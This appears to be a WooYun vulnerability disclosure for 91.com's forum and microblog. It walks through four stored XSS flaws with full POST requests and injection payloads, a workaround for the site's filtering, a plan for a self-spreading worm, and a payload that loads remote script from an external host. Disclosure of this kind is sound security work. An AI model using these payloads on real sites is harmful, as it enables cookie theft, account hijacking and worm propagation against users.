WooYun.org

1. 首先是论坛的， 我测试了论坛发帖里的的图片功能。
首先是正常发送一个图片后，F12打开调试工具，找到刚发的图片。
<img class="scrollLoading" onclick="sjBBS.showImage.show(this);" href="http://p1.91huo.cn/newbbs91/2012/05/31/1338433258596.jpg" src="http://p1.91huo.cn/newbbs91/2012/05/31/1338433258596.jpg">
可以看到当点击图片的时候，调用了sjBBS.showImage.show
查看 sjBBS.showImage.show 的代码：

var $this = $(obj),
....
src = $this.attr('src');
....
var con = "<img src='"+ src +"' width='"+ sw +"' />"

因而，如果我们构造src为 http://image_server/2012/06/16/1339856778551.png#'onload='alert(/ok/);//aa.png
就会变成
<img src='http://image_server/2012/06/16/1339856778551.png#'onload='alert(/ok/);//aa.png' width='100' />
这个时候onload里的代码就会被执行了。
根据以上原理，我们可以发送以下数据。
POST http://bbs.91.com/modify/42/124/4fc6df44153b79013/p4fdc979dc7930c
------WebKitFormBoundaryTPxWRJUHf4rt3qZa
Content-Disposition: form-data; name="wysiwyg"
1
------WebKitFormBoundaryTPxWRJUHf4rt3qZa
Content-Disposition: form-data; name="post_body"
[img]http://image_server/2012/06/16/1339856778551.png#'onload='alert(/ok/);//aa.png[/img]
------WebKitFormBoundaryTPxWRJUHf4rt3qZa
Content-Disposition: form-data; name="ubb"
on
------WebKitFormBoundaryTPxWRJUHf4rt3qZa--
如果我们把图片上的文字弄为：
点此看美女！！！！！！！！！！！
当用户点击的时候，就会中招啦！！
如图：

--------------------------------------------------
2 . 社区个人资料处存储型Xss，可用作Xss 后门，
每次用户查看自己用户资料的时候（即进入http://t.91.com/member/UserSettings/的时候），
都会执行我们的JS代码，或者JS文件。
由于该后门是t.91.com 域名下的， 可以结合后面所提到的 t.91.com的类微博功能一起。
这里我就不多介绍了。 缺陷如下： 对uniquename做了过滤，但是没有对nickname过滤。
至于下面的email, mobile等值，是否过滤了，我没去看，如果没过滤，请一起过滤！
http://t.91.com/member/Ajax_Profile
uniquename bdhxxxxxxxxyyy
old_uniquename 游客293464167221304
nickname aaaavv"><img src=1 onerror=alert(1)><
nickname_hidden 游客293464167221304
realname 李明
sex 0
birth_year 0
birth_month 0
birth_day 1
birthprovince 0
birthcity 0
resideprovince 510000
residecity 510100
resideprovince_hidden 四川省
residecity_hidden 成都市
email
mobile
homepage
interest
introduction
漏洞效果，如下图：
每次用户进入个人资料页面，就会触发我们的JS代码，同时，我们可以劫持【保存按钮】，使得每次用户每次修改个人资料的时候，都会带上我们的恶意代码，从而形成长久劫持。

--------------------------------------------------
3. 微博发图片功能 XSS
这个漏洞的原因太简单，也不多说，图片字段upimg，没有过滤双引号。 导致可以直接添加onload属性，运行代码。

POST http://t.91.com/broadcast/add
tid
content	aaaaaaaaaaaaaaaa
secret	0
video
upimg	http://p2.91huo.cn/t91/broadcast/c7/2d/91/c72d9149f543841f5ce0175f1f96cc1e.small.png"onload="alert(document.cookie);

上面的upimg是我们构造好的参数。
当我们发布一条微博之后，关注我们的用户，将会被XSS， 这个可以做成蠕虫。
即： 看到这条微博的用户，将会自动发送一条带有XSS的微博信息，几何级传播，会在整个t.qq.com迅速蔓延。

打开调试工具，看看我们注入的代码。

--------------------------------------------------
4. 微博发链接功能Xss
还是微博的，链接处，经过精心构造，一样可以执行我们的恶意JS代码，造成微博蠕虫。
缺陷如下： [url:地址]XXXX[/url] 这个UBB标签在输出时，存在问题，导致XSS。

http://t.91.com/broadcast/add
tid
content	#null#[url:http://www.baidu.com<img/src="1"onerror="alert(/xxxxxx/)">]aaaaaaaa[/url]
secret	0
video
upimg

这样遇到一个有点意思的情况。
A. 代码里，不能出现() ，
B. 如果我们用，&#28; &#29; 来表示()的时候， &#28; &#29; 里的 #...# 会被认为是微博话题，#话题# ...
因而这里我用 &#x28;..) 来绕过这个限制。
将content构造为以下的代码

#null#[url:http://www.baidu.com<img/src="1"onerror="jQuery.getScript('//xsst.sinaapp.com/m.js')">]aaaaaaaa

同样打开调试工具，查看